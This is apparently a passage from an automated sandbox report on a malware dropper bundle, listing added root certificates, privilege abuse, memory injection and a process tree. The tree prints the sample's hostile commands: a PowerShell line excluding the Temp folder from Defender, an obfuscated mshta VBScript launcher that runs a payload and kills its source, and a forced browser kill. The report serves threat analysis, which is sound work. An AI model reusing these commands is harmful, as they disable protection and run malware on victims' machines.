a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\5523242.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\ProgramData\3086290.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\3769868.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\8557825.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\5930282.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\ProgramData\5258754.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TFGKB.tmp\ultramediaburner.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JV285.tmp\setup_2.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\534rc0mn.fcf\installer.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1656 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 1192 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 620 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8A462874\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NRU1I.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$4013A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS8A462874\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\3086290.exe

"C:\ProgramData\3086290.exe"

C:\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-VQ6S5.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\ProgramData\4676496.exe

"C:\ProgramData\4676496.exe"

C:\ProgramData\8557825.exe

"C:\ProgramData\8557825.exe"

C:\ProgramData\1596296.exe

"C:\ProgramData\1596296.exe"

C:\ProgramData\3769868.exe

"C:\ProgramData\3769868.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\1596296.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\1596296.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 976

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1292 -s 1392

C:\ProgramData\8557825.exe

"C:\ProgramData\8557825.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\ProgramData\5552630.exe

"C:\ProgramData\5552630.exe"

C:\ProgramData\5523242.exe

"C:\ProgramData\5523242.exe"

C:\ProgramData\5930282.exe

"C:\ProgramData\5930282.exe"

C:\Users\Admin\AppData\Local\Temp\is-4EDRO.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4EDRO.tmp\setup_2.tmp" /SL5="$1F01C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\1318651.exe

"C:\ProgramData\1318651.exe"

C:\ProgramData\5258754.exe

"C:\ProgramData\5258754.exe"

C:\Windows\SysWOW64\mshta.exe

